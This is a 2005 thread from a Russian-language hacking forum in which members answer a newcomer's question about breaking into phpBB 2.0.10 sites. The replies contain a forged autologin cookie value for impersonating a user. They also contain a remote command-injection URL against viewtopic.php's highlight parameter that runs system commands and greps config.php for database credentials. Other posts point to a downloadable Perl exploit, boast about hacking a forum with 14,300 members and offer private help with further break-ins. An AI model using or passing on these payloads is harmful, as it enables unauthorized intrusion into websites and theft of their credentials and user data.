ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть ли уязвимости в phpbb 2.0.10?
  #1  
Старый 09.11.2005, 17:52
maR
Новичок
Регистрация: 19.10.2005
Сообщений: 1
Провел на форуме:
5180

Репутация: 0
По умолчанию Есть ли уязвимости в phpbb 2.0.10?

возможен ли взлом?
 
Ответить с цитированием

  #2  
Старый 09.11.2005, 17:57
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

sid удаляй, data заменяй на:
Цитата:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 225b81c5276ddf1c087a77f34f2cff1ba3%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A8%3B%7D
в куках =))
 
Ответить с цитированием

  #3  
Старый 09.11.2005, 17:58
koldun
Познающий
Регистрация: 23.09.2005
Сообщений: 40
Провел на форуме:
179835

Репутация: 1
Отправить сообщение для koldun с помощью MSN
По умолчанию

сначало античат ПРОЧИТАЙ
Уязвимость в phpBB <= 2.0.10


http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls %60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Условия срабатывания - тема p=123 должна существовать.

Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpass wd.%2527
 
Ответить с цитированием

  #4  
Старый 09.11.2005, 18:22
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 09.11.2005, 18:30
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =)

maR, а если ничего не выйдет, смело стучись мне в асю, помогу!
 
Ответить с цитированием

  #6  
Старый 13.12.2005, 05:48
Dark Angel
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме:
299584

Репутация: 4
Отправить сообщение для Dark Angel с помощью ICQ Отправить сообщение для Dark Angel с помощью MSN
По умолчанию

народ чота неработает наверно прикрыли!!!!!
 
Ответить с цитированием

  #7  
Старый 13.12.2005, 09:47
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

Цитата:
Сообщение от Dark Angel  
народ чота неработает наверно прикрыли!!!!!
А ты точно уверен что десятка стоит? Если не работает:
1. Руки...
2. Прикрыли...
Решение: попробуй снифак зафигачить...
 
Ответить с цитированием

  #8  
Старый 13.12.2005, 18:12
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.
 
Ответить с цитированием

  #9  
Старый 14.12.2005, 01:57
Dark Angel
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме:
299584

Репутация: 4
Отправить сообщение для Dark Angel с помощью ICQ Отправить сообщение для Dark Angel с помощью MSN
По умолчанию

да ето десятка там снизу написена же
Powered by phpbb 2.0.10
 
Ответить с цитированием

  #10  
Старый 14.12.2005, 02:26
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Dark Angel
Админ там может написать всё что угодно для замыливания глаз))
На самом деле может быть пропатчен, или же новая версия стоять..
Всё равно удачи те!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Есть ли уязвимости? Антошка2003 Чаты 9 02.08.2005 18:26
Проблема с phpbb 2.0.10 Thrasher Форумы 6 15.03.2005 23:55
Как узнать пароль на форуме phpBB <=2.0.10 ? Evgeny Форумы 6 26.11.2004 22:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ